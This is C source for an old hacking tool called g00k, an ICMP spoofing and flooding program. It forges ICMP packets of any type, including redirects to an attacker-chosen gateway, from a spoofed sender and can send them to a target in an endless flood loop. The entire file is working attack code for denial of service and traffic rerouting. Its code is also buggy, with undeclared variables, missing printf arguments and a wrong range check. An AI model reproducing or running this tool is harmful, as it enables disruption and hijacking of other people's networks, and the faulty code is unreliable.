/*
 * g00k.c
 * by vect0rx
 * based exclusively on n00k by crisk and ping.c
 *  
 * try to icmp-pingflood a host using spoofed icmp pings.
 * 
 * version 0.0.1beta   Feb 1996
 * 
 * Possible enhancements:  
 * - Automatic/semi-automatic route tracing
 * - Source routing IP (in icmp_pkt.c) 
 *
 * Enhancements: 
 * - Minor tweaks to allow for any ICMP packet type/code combo to be
 *   specified on the command line (Yes, even our fav, ICMP redirects)
 * - Notes on tripling bandwidth for echo floods.
 *      By s0nic.
 *
 */


/* #define ICMP_PKT_DEBUG */ 
#define RESOLVE_QUIET

#define modem  250000 /* Standard issue 28.8 thru KFLEX modem */
#define ISDN 100000 /* ISDN link */
#define FULLT1 1000 /* Full T1 and higher */

#define TIME modem 
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
/*       #include <sys/time.h>
       #include <sys/types.h>
       #include <unistd.h> */
#include "resolve.c"
#include "icmp_pkt.c"

#define N00K_VERSION "0.0.1beta"

/* GENERAL ROUTINES ------------------------------------------- */

void banner(void)
     {
	printf("\ng00k\n");
	printf("version %s\n",N00K_VERSION);
	printf("by vect0rx based on n00k by crisk.\n\n");
     }
	
void usage(const char *progname)
     {
	printf("\nusage: \n");
	printf("%s [-f] [-s <n>] <type> <code> <spoof> <dest> <origdest> [<new gateway>]\n\n",progname);
	printf("\t-s <n> : Packet size\n");
	printf("\t-f : flood\n");
	printf("\t<type>     	   : packet type (0 to 18)\n");
	printf("\t<code>     	   : unreachable type (0 to 12)\n");
	printf("\t<spoof>    	   : address of fake ICMP packet sender\n");
	printf("\t<dest>     	   : destination of the unreach message\n");
	printf("\t<origdest>	   : the faked destination or the orig-tcp packet\n");
	printf("\t<new gateway>	   : reroute through this gateway\n");
	printf("\t\tNote! You must have icmp type 5 and code 0-3 (3 or 2 are best)\n");
	printf("\n");
     }

/* OPTION PARSING -------------------------------------------- */

unsigned char *dest_name;
unsigned char *origdest_name;
unsigned char *newgw_name = NULL;
unsigned char *spoof_name = NULL;
struct sockaddr_in destaddr;
unsigned long origdest_addr;
unsigned long dest_addr;
unsigned long spoof_addr;
unsigned long gw_addr;
unsigned char type;
unsigned char code;
unsigned      sport, dport;
unsigned long seq;
char          flood = 0;

char *unreachables[] =  {"Network unreachable",
			 "Host unreachable",
			 "Protocol unreachable",
			 "Port unreachable",
			 "Fragmantation needed and DF set",
			 "Source route failed",
			 "Network unknown",
			 "Host unknown",
			 "Source host is isolated",
			 "Network administratively unreachable",
			 "Host administratively unreachable",
			 "Network unreachable - type of service",
			 "Host unreachable - type of service"};    
			 
int resolve_one(const char *name, unsigned long *addr, const char *desc)
     {
	struct sockaddr_in tempaddr;
	if (resolve(name, &tempaddr,0) == -1) {
	   printf("error: can't resolve the %s.\n",desc);
	   return -1;
	}
	    
	*addr = tempaddr.sin_addr.s_addr;
	return 0;
     }

int resolve_all(const char *origdest,
		const char *dest,
		const char *spoof)
     {
	if (resolve_one(origdest,&origdest_addr,"origdest address")) return -1;
	if (resolve_one(dest,&dest_addr,"dest address")) return -1;
	if (spoof!=NULL) 
	  if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;
	
	destaddr.sin_addr.s_addr = dest_addr;
	destaddr.sin_family      = AF_INET;
	destaddr.sin_port        = 0;
     }
	
void give_info(void)
     {
	printf("# target address          : %s (%s)\n",dest_name,inet_ntoa(dest_addr));
	printf("# original packet target  : %s (%s)\n",origdest_name,inet_ntoa(origdest_addr));
	printf("# spoof-from address      : %s (%s)\n\n",spoof_name,inet_ntoa(spoof_addr));
	printf("# bogus TCP source port   : %u\n",sport);
	printf("# bogus TCP dest. port    : %u\n",dport);
	printf("# bogus TCP sequence no.  : %lu\n\n",seq);
	printf("# ICMP packet type	  : %u \n\n",type);
	printf("# ICMP unreachable type   : %u (%s)\n\n",code,unreachables[code]);
     }

int parse_args(int argc, char *argv[]) 
     {
	int opt;
	
	char *endptr;
		
	while ((opt=getopt(argc, argv, "fq:p:d:s:")) != -1)  {
	   switch(opt)  {
	      case 'f': flood = 1; break;
	      case 's': cize = strtoul(optarg,&endptr,10); break;
	      case 'q': seq = strtoul(optarg,&endptr,10);
			if (*endptr != '\0')  {
			   printf("%s: bad sequence number '%s'\n", argv[0], optarg);
			   return -1;
			}
			break;
	      case 'p': sport = strtoul(optarg,&endptr, 10);
			if (*endptr != '\0')  {
			   printf("%s: bad source port number '%s'\n",argv[0],optarg);
			   return -1;
			}
			break;
	      case 'd': dport = strtoul(optarg,&endptr, 10);
			if (*endptr != '\0')  {
			   printf("%s: bad dest port number '%s'\n",argv[0],optarg);
			   return -1;
			}
			break;
	      case '?':
	      case ':': return -1; break;
	   }
	  
	}
	    
	if (optind > argc-2)  {
	   printf("%s: missing parameters\n",argv[0]);
	   return -1;
	}
	
	type = strtoul(argv[optind++],&endptr,10);
	if ((*endptr != '\0') || (type>18)) {
	   printf("%s: bad ICMP type (0-18 only)\n");
	   return -1;
	}
	code = strtoul(argv[optind++],&endptr,10);
	if ((*endptr != '\0') || (type>12)) {
	   printf("%s: bad unreachable type (0-12 only)\n");
	   return -1;
	}
	
	if ((type == 2) || (type == 3)) {
	   printf("%s: (warning) unreaches of type 2 and 3 should be host-originated\n\n",argv[0]);
	}
	
	spoof_name = argv[optind++];
	dest_name = argv[optind++];
	origdest_name = argv[optind++];
	if(argv[optind+1])
		newgw_name = argv[optind++];
		
	return 0;                       
     }


/* MAIN ------------------------------------------------------ */

int main(int argc, char *argv[])
     {
	int s;
	int floodloop;

	banner();
	
	if (parse_args(argc,argv)) 
	  {  
	     usage(argv[0]); 
	     return;
	  }

	
	resolve_all(origdest_name, dest_name, spoof_name);
	if (newgw_name)
		resolve_one(newgw_name,&gw_addr,"New Gateway address"); 
	else 
		gw_addr = 0;
	give_info();
	
	s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	
	if (!flood)
	  {
	     if (icmp_unreach_send(s,&destaddr,type,code,spoof_addr,origdest_addr
				   ,dest_addr,sport,dport,seq,gw_addr) == -1)
	     {
		printf("%s: error sending packet\n",argv[0]); perror(""); return;
	     }
	  }
	else
	  {
	     printf("flooding. each dot represents 50 packets\n");
	     floodloop = 1;
	     while(1)
	     {
		usleep(TIME);
		 if (icmp_unreach_send(s,&destaddr,type,code,spoof_addr,
				       origdest_addr,dest_addr,sport,dport,
				       seq++,gw_addr) == -1) 
		 {
		    printf("%s: error sending packet\n",argv[0]); perror(""); return; 
		 }
	      
	       if (!((floodloop = floodloop+1)%50)) 
		  { fprintf(stdout,"."); fflush(stdout); 
		  }
		
	     }
	  }
     }

